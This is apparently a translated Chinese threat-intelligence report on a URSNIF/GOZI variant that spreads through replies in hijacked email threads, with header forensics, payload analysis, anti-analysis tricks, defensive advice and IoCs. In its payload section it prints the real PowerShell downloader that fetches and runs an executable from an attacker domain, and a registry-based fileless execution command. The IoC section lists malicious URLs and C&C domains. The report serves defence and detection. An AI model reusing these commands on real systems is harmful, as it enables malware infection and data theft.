魔高一尺:URSNIF惡意軟體新變種通過回覆郵件實現傳播
一、概述
大多數網路釣魚活動,其本質非常簡單,並且易於發現。攻擊者往往會發送一些看似合法的電子郵件,並在其文字中嵌入惡意連結,或在郵件中新增惡意附件。然而,我們在今年9月監測到的惡意郵件活動卻表明,攻擊者正在採取更為複雜的網路釣魚形式。該惡意活動會盜取電子郵件賬戶,並對郵箱中已有的郵件內容進行回覆,在回覆的內容中附帶惡意軟體。對已有郵件的回覆,實際上是連續通訊中的一部分,因此這種特殊的釣魚方式難以被使用者發現,也難以檢測。通常,受害者都沒有意識到他們正在遭受釣魚郵件的威脅。
這些攻擊與今年早些時候Talos發現的 ofollow,noindex">URSNIF/GOZI惡意郵件活動 非常相似,該惡意活動使用暗雲殭屍網路中部分被劫持的計算機向已有郵件傳送回信,很可能是URSNIF/GOZI惡意郵件活動的升級版本或演變版本。
根據迄今為止收集到的資料,我們發現該惡意活動主要影響北美和歐洲地區,同時在亞洲和拉丁美洲地區也發現了類似的攻擊。
本次惡意活動的主要目標是教育、金融和能源行業。然而,此次惡意活動還影響到了其他行業,包括房地產、交通運輸、製造業和政府。
二、捕獲樣本
我們發現了該惡意活動的一個示例,並對電子郵件的內容進行了截圖,如下所示。
由於發件人是一位熟悉的人,並且郵件也是往來對話中的一部分,因此作為收件人,很容易會相信這只是對此前郵件內容的另一封回覆郵件。此外,該回復的標題和語法似乎都是正確的,甚至在電子郵件的末尾還附帶了簽名。
當然,如果我們仔細檢查,會發現這封電子郵件中存在一些可疑的地方。最明顯之處在於,使用的語言從法語變成了英語。此外,惡意電子郵件中的簽名與合法電子郵件的簽名是不同的。最後還有一點,就是該郵件的內容是通用的,所以可能會偏離原來的交流內容。儘管我們不能通過這些因素,直接判斷出這封郵件是惡意的,但至少能夠提起警惕。然而,如果不經仔細閱讀,這些小細節可能難以發現,特別是那些每天有大量郵件往來的人。
三、擦亮慧眼:分析電子郵件頭部資訊
在對電子郵件的頭部資訊進行檢查後,我們發現了該攻擊的一些有趣之處。
在這裡,有3個地方需要注意:
1、通常,惡意郵件都會偽造發件人,會使用“Return-Path”或“Reply-To”的SMTP頭部,以便收件人能夠將郵件直接回復給惡意攻擊者。而在我們觀察到的示例中,沒有這兩個頭部資訊,並且所有回覆都會發送至發件人(也就是被攻陷的郵箱賬戶)。這就說明攻擊者可能已經通過了發件人郵箱的身份驗證。
2、“In-Reply-To”頭部(或其他類似的SMTP頭部欄位)表示這封郵件是對已有電子郵件通訊的回覆。
3、這封電子郵件的第一跳(The First Hop)來自於“rrcs-50-74-218-2[.]nyc[.]biz[.]rr[.]com”,這個地址對於家庭使用者來說並不常見。對於組織使用者來說,除非郵件是來自遠端的服務,否則郵件都應該是從組織內部的伺服器傳送(例如:一個“sender.co.ca”域內的主機)。
考慮到這些因素,可以看出這封電子郵件是從美國發出的。而根據示例中發件人郵箱的域名.ca,這封郵件應該是發自加拿大。
經過進一步的調查,我們發現該域名在2018年9月期間使用了多個電子郵件地址,傳送了大量不同的電子郵件。
我們留意到,攻擊者經常會將附件的檔名與發件人的組織名稱相對應,這樣就有可能使得郵件看起來更加真實。附件檔名的格式通常是[發件人所在組織]+[與此前通訊相關的一個動詞,例如“查詢”或“請求”].doc,或者就是簡單的[發件人所在組織].doc。這樣的附件,使這封郵件不容易被人懷疑。在部分惡意活動中,我們看到附件使用了通用的檔名,例如“查詢”、“宣告”和“請求”。
根據郵件的標題,我們可以假定,攻擊者通過某種方式獲得了真實的郵箱賬戶,並且將該郵箱賬戶用於類似BEC的騙局之中。考慮到其運作方式和使用的技術,我們懷疑這一新的惡意郵件活動是URSNIF/GOZI惡意郵件活動的一部分。傳送方的IP地址,可能是殭屍網路中被感染的主機之一。
四、對Payload的分析
一旦使用者雙擊電子郵件中的惡意.doc附件,就會呼叫Shell/">PowerShell從C&C伺服器下載最新版本的URSNIF(檢測為TSPY_URSNIF.THAOOCAH)惡意軟體:
powershell $VWc=new-object Net.WebClient;$wIt=’http: //t95dfesc2mo5jr. com/RTT/opanskot.php?l=targa2.tkn’.Split(‘@’);$jzK = ‘369’;$Aiz=$env:public+’\’+$jzK+’.exe’;foreach($fqd in $wIt){try{$VWc.DownloadFile($fqd, $Aiz);Invoke-Item $Aiz;break;}catch{}}
該檔案是惡意軟體的主要載入程式。但是,在執行其例程之前,它首先會檢查作業系統版本,只允許在Microsoft作業系統上執行,特別是Windows Vista及以上版本。此外,它會避免在某些語言環境中執行,例如CN(中國)和RU(俄羅斯)。
主載入器負責管理整個執行過程,並將事件記錄在文字檔案中:
%User Temp%\{temp filename}.bin
它會從C&C伺服器下載其他模組,並將它們儲存在登錄檔資料夾HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4中。
下圖展示了建立的登錄檔項,以及包含指令碼和二進位制檔案的條目。
請注意,儘管這些鍵和部分登錄檔項的名稱在不同計算機上不盡相同,但其位置始終位於HKCU\Software\AppDataLow\Software\Microsoft\。
在下載元件後,會執行儲存在comsxRes(此名稱可能會發生變化)中的PowerShell指令碼。下面的命令列指令展示瞭如何呼叫登錄檔中的十六進位制值。
exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-7C9D-AB0E-15700F2219A4’).comsxRes
當此指令碼載入儲存在登錄檔中的嵌入式二進位制檔案時,無檔案執行就開始了。在下圖中,我們用–{hex-encoded binary}—替換了二進位制資料,從而能展現出全部程式碼。原始指令碼的最底部部分也是使用了Base64編碼,我們對其進行了解碼,以保證可讀性。
惡意程式會在建立的登錄檔項中搜索Client32/Client64,並將該程式碼注入到explorer.exe以保證可以持續保留在記憶體中。登錄檔中的其他條目在後續例程執行過程中是必不可少的,因為這些條目會被注入的惡意軟體程式碼所引用。例如,“TorClient”條目指定了惡意軟體如何通過Tor網路與其C&C伺服器通訊。
五、分析資訊竊取例程
最終的Payload是一個名為Client32或Client64的DLL檔案,具體取決於主機的體系架構。它也如同大多數惡意軟體的元件一樣,儲存在登錄檔中。最終Payload的主要目標是進行資訊竊取,其中包括以下資訊:
·系統資訊
· 已安裝的應用程式列表
· 已安裝的驅動程式列表
· 正在執行的程序列表
· 網路裝置列表
· 外網IP地址
· 電子郵件憑據(IMAP、POP3、SMTP)
· Cookie
· 證書
· 螢幕視訊捕獲(AVI格式)
· 通過網頁劫持獲得的財務相關資訊
六、BSS段加密
在我們所分析的所有URSNIF二進位制檔案中,都包含這個加密部分。在這一部分中,包含著將在程式碼中使用的所有相關字串,並且僅會在惡意程式執行時解密。因此,我們就無法對字串進行分析,也無法進行反編譯,使得整個分析過程更為複雜。
七、惡意軟體的反分析機制
為了防止研究人員通過沙箱獲取到伺服器和配置等資訊,URSNIF會在執行時兩次檢查游標的位置。如果游標位置不發生變化,那麼就說明該惡意軟體可能正在沙箱中進行分析,或是正在通過偵錯程式進行分析。反分析的檢查將在BSS部分被解密之前完成。如果發現存在問題,那麼就會導致該惡意程式進入無限迴圈,併產生亂碼字串。
根據我們在這次攻擊中所看到的情況,似乎攻擊者正在不斷對他們的網路釣魚攻擊方式進行更新,並探索更能有效迷惑使用者的方法。這些網路攻擊者不再滿足於常規的釣魚郵件,而是將他們的攻擊巧妙的整合到正在進行的對話中,這就使得普通使用者難以發現。這樣的升級,其實正是攻擊者和安全人員之間永無止境的貓捉老鼠遊戲中的一部分。
八、防範方法
由於網路釣魚攻擊依賴於社會工程技術,因此它們往往非常有效。這些技術會建立一些可信的場景或對話,從而誘使使用者洩漏資訊,或下載惡意軟體。在本文的案例中,最棘手的問題在於發件人是真實的使用者。由此提醒大家,應該儘可能通過雙因素身份認證(2FA)來保護自己的網路賬戶。此外,作為組織,還應該考慮將雙因素身份認證整合到系統之中,並且為組織中的成員提供可靠的認證。
此外,要防範網路釣魚,我們還應注意以下幾點:
1、組織中的所有使用者都應具備足夠的安全意識,瞭解網路釣魚攻擊的概念、網路釣魚攻擊的常見手段和識別可疑電子郵件的方法。
2、遇到任何可疑的請求時,都應進一步與相關人員進行核實,特別是在進行金融交易之前,務必要謹慎操作。
3、避免開啟任何建議修改Word中安全配置的文件,這樣的文件很有可能是惡意檔案。
4、留意郵件中所有可疑之處,包括是否符合對話的上下文、是否使用了你們常用的語言、是否使用的是常用的郵件簽名。
九、使用可管理的檢測與響應服務(MDR)
隨著網路釣魚攻擊方式的日益複雜,組織內部的IT團隊和安全團隊可能難以監控網路和各個終端是否存在被攻擊的跡象。儘管提升員工的安全意識有助於防範威脅,但如果要讓員工識別精心偽造的電子郵件,還是具有一定的難度。
針對沒有安全運營中心(SOC)的組織而言,就面臨這一個雙重挑戰,因為一般的IT團隊往往缺乏進行威脅研究和分析的經驗。針對這些組織,建議採用第三方安全廠商的“可管理的檢測與響應服務”(MDR),從而幫助抵禦高階威脅。Mdr可以為攻擊中的各種環境指標提供一個基線,並且使用這些指標作為安全分析的基礎。
十、IoC
Word檔案的雜湊值
檢測為TROJ_FRS.VSN0BI18 / Trojan.W97M.POWLOAD.SMY:
bdd3f03fb074c55cf46d91963313966ce26afdb13b1444258f8f9e7e723d8395
dd7b4fc4d5cc1c1e25c800d5622423725a1b29000f93b658a54e267bbbe6f528
4df47982fdd1ac336625600fa8c947d45909248309b117d05fc532a2260c7bc4
檢測為Trojan.W97M.POWLOAD.FGAIBT:
f88ef62f2342f4d1105cfe85395b735efd3f0308b79551944983ce245d425510
567fe3794a9eec27697ae0634861d284279261880887f60a7374c6cbe63b7674
檢測為Trojan.W97M.POWLOAD.NSFGAIBF:
52d3ece98b6b3b686925156c3d62d8ce133fe3326e11b4c981c251452e4a41d2
檢測為Trojan.W97M.POWLOAD.SMEMOT:
4d0762a6b2879d2fa821716db76bc980fdb3b8507611d2853df58c0d4127f9ea
檢測為Trojan.W97M.POWLOAD.SMEMOT2:
47e2c66ba16e3ffa9704a13f2c00670319bf292b3d2aa7deede5442da02181e5
c2c946f7fd63fc15048a9af4043686f5a56b169e74cb36892fb8d1563b810467
檢測為Trojan.W97M.POWLOAD.SMTHF3:
21ce42a1fc6631ed10db3d0e44b4ccb6d96a729fc494bd86a57cf07ff72cb8f2
檢測為Trojan.W97M.POWLOAD.SMY:
de8f8f39259992886da3b07635cbf121027379e5c1a156a32c6c6e5ace3cc4c3
6b387b8534da9cc7cf0af4f2fb8c2a92f9316c0ea6ffb9cfe49b09b4c3df9778
6bf99f4b17a07e788219333d96a7a19c9eddc1b49d16c2a21da255a6a16c80d5
33d078881456e3b930c480803902fa28142b17c8550f3932e7cf4a1df0eb9213
6ca2d4dcea456b9d4c87f211ed20bb32f71a0c78ee8059b934162e643d66e0c9
82bee0c249b63f349d212a36f0b9ad90f909017ac734eac133353a1135d7474d
1f2e12a58cc23f4e6e7f17b8c1a5c50b88614fda103577354b9564f2dffc257f
檢測為W2KM_POWLOAD.FGAIBT:
1db71aec64d0e391a8c99f4f6ee214962a281733643ace0874cf69e2843f448c
檢測為W2KM_POWLOAD.NSFGAIBF:
c33d642da477f65c11daa9e8098b9917c4c5a6f131dd1369a20cb1b14c4cc261
398e677290b1db00d8751c3498847ad9c7d10721630175d2506c4d45af19d229
813a08d3b2216c89d42e8225c6de760d785905d1c76bd7428201d68c3c368f65
檢測為W2KM_POWLOAD.THIACAH:
5aed7d6a3e8692143e53f9556cd3aa371149c96b91c02d1c659cb58d88572e47
下載的URSNIF
檢測為TSPY_URSNIF.THAOOCAH:
0a38d92775cfc7182076d9a21c4937149ea8be6ebf22b9530afbca57d69c0d46
可執行檔案Payload
檢測為TrojanSpy.Win32.URSNIF.BAIEF:
358bd52ac46755b1c6fa73805a7a355450f85f4bcf1b2e798a04960743390422
檢測為TSPY_URSNIF.THAOOCAH:
e8633f2f2b6b0b8f7348b4660e325ab25b87ec8faa40fb49eb0215b31bd276aa
檢測為TSPY_URSNIF.BAIEB:
f92ba10fe245c00575ae8031d4c721fe0ebb0820a4f45f3bbce02654a6e7f18d
下載URL
hxxp://t95dfesc2mo5jr[.]com/RTT/opanskot[.]php?l=targa2[.]tkn
hxxp://enduuyyhgeetyasd[.]com/RTT/opanskot[.]php?l=omg8[.]tkn
hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa4[.]tkn
hxxp://2dhtsif1a8jhyb[.]com/RTT/opanskot[.]php?l=okb1[.]tkn
hxxp://yrtw1djmj6eth7[.]com/RTT/opanskot[.]php?l=okb7[.]tkn
hxxp://popoasdzxcqe[.]com/YUY/huonasdh[.]php?l=rgr7[.]tkn
hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa2[.]tkn
hxxp://e3u1oz4an1dqmj[.]com/RTT/opanskot[.]php?l=okb9[.]tkn
hxxp://popoasdzxcqe[.]com/YUY/huonasdh[.]php?l=rgr3[.]tkn
hxxp://2dhtsif1a8jhyb[.]com/RTT/opanskot[.]php?l=okb5[.]tkn
hxxp://hbhbasdqweb[.]com/YUY/huonasdh[.]php?l=rgr4[.]tkn
hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa4[.]tkn
C&C伺服器
app[.]kartop[.]at
doc[.]dicin[.]at
doc[.]avitoon[.]at
app[.]avitoon[.]at
ops[.]twidix[.]at
xx[.]go10og[.]at
api[.]kartop[.]at
m1[.]fofon[.]at
cdn[.]kartop[.]at
api[.]tylron[.]at
chat[.]twidix[.]at
api[.]kaonok[.]at
chat[.]jimden[.]at
mahono[.]cn